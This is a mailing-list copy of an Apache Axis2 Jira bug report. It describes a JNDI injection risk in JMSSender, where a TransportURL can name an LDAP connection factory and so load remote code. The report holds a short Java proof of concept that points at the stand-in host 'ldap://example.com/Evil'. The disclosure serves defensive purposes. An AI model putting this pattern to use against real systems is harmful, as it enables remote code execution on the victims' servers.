[jira] [Created] (AXIS2-6062) Is such a flexibility necessary allowing LDAP (and RMI, JRMP, etc.) protocol in `JMSSender`?

Tue, 07 Nov 2023 18:53:05 -0800 

Letian Yuan created AXIS2-6062:
----------------------------------

             Summary: Is such a flexibility necessary allowing LDAP (and RMI, 
JRMP, etc.) protocol in `JMSSender`?
                 Key: AXIS2-6062
                 URL: https://issues.apache.org/jira/browse/AXIS2-6062
             Project: Axis2
          Issue Type: Bug
          Components: JMS transport
    Affects Versions: 1.8.2
            Reporter: Letian Yuan


In "org.apache.axis2:axis2-transport-jms", there is a method, 
`{{{}org.apache.axis2.transport.jms.JMSSender.invoke{}}}`, designed to send a 
JMS message. However, if we send a JMS message like this:

 

{{    MessageContext context = new MessageContext();}}

{{    context.setProperty("TransportURL", 
"jms://foobar?transport.jms.ConnectionFactoryJNDIName=ldap://example.com/Evil";);}}

{{    JMSSender sender = new JMSSender();}}

{{    sender.invoke(context);}}

 

Then, arbitrary commands from remote server "ldap://example.com/Evil"; would be 
executed.

We want to discuss with you about it.

First, excecuting arbitrary commands from remote server is quite dangerous. 

Second, as far as we know, no one would use LDAP protocol to get 
`{{{}ConnectionFactory{}}}`.

Third, it seem this behavior has not been documented in your “User’s Guide”, so 
library users might not know this API of sending JMS messages can be used to 
execute arbitrary commands. So, I think that library users are very possible to 
misuse this API. For example, concatenating user input to the parameter of 
`{{{}invoke{}}}`. Or, making the parameter of `{{{}invoke{}}}` available in a 
configuration file such as `{{{}foobar.properties{}}}`. We know that such cases 
rarely happen and might not be your design purpose, but it is possible anyway. 
As long as an attacker can control the parameter of `{{{}invoke{}}}`, remote 
code injection might happen.

Therefore, we want to ask you whether it is your design purpose and whether it 
is necessary for LDAP protocol (and RMI, JRMP, etc.).

This is just our opinion, and we are willing to discuss it with you.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)

---------------------------------------------------------------------
To unsubscribe, e-mail: java-dev-unsubscr...@axis.apache.org
For additional commands, e-mail: java-dev-h...@axis.apache.org

Reply via email to